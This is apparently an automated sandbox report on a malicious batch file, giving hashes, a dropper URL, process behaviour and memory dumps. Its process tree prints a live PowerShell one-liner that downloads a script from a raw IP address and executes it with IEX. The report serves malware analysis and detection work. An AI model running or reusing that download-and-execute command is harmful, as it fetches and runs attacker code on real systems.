b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca

Analysis

Target

d8b4df362b6cf1bf526634ea889b42de.bat
Size

213B
MD5

fa5f98db7255446f6688e03c1b8639e1
SHA1

9149b6cdcab524d9e06254b52dcdcb0455cdb7ac
SHA256

b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca
SHA512

e13b67fd455c2e28362529b6cc986135be45d21ad68a8a7b7af6203b4766dce4fe74bd1f8fc16f7de6b09f1b9a787982d4302b2aa26c48c5a6326503b6d3d4a8

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

WerFault.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 3768 wrote to memory of 2932	3768	cmd.exe	powershell.exe
PID 3768 wrote to memory of 2932	3768	cmd.exe	powershell.exe
PID 3768 wrote to memory of 2932	3768	cmd.exe	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

816 2932 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 816 WerFault.exe
Token: SeBackupPrivilege 816 WerFault.exe
Token: SeDebugPrivilege 816 WerFault.exe

pid	pid_target	process	target process
816	2932	WerFault.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"
2⤵
PID:2932

memory/816-1-0x0000000004DA0000-0x0000000004DA1000-memory.dmp

Filesize
4KB

Download
memory/816-9-0x00000000053D0000-0x00000000053D1000-memory.dmp

Filesize
4KB

Download
memory/2932-0-0x0000000000000000-mapping.dmp

Download
memory/2932-2-0x0000000000000000-mapping.dmp

Download
memory/2932-3-0x0000000000000000-mapping.dmp

Download
memory/2932-4-0x0000000000000000-mapping.dmp

Download
memory/2932-5-0x0000000000000000-mapping.dmp

Download
memory/2932-6-0x0000000000000000-mapping.dmp

Download
memory/2932-7-0x0000000000000000-mapping.dmp

Download